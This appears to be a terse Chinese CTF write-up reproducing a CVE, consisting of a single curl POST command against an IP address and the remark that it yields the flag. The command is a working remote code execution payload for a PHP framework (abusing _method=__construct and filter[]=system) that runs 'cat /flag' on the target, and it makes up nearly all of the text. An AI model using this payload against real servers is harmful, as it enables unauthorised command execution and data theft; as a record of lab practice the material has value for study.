1,CVE复现,payload: 1curl http://121.43.27.97:20105/index.php?s=captcha -X POST -d _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat\ /flag 2.得到flag
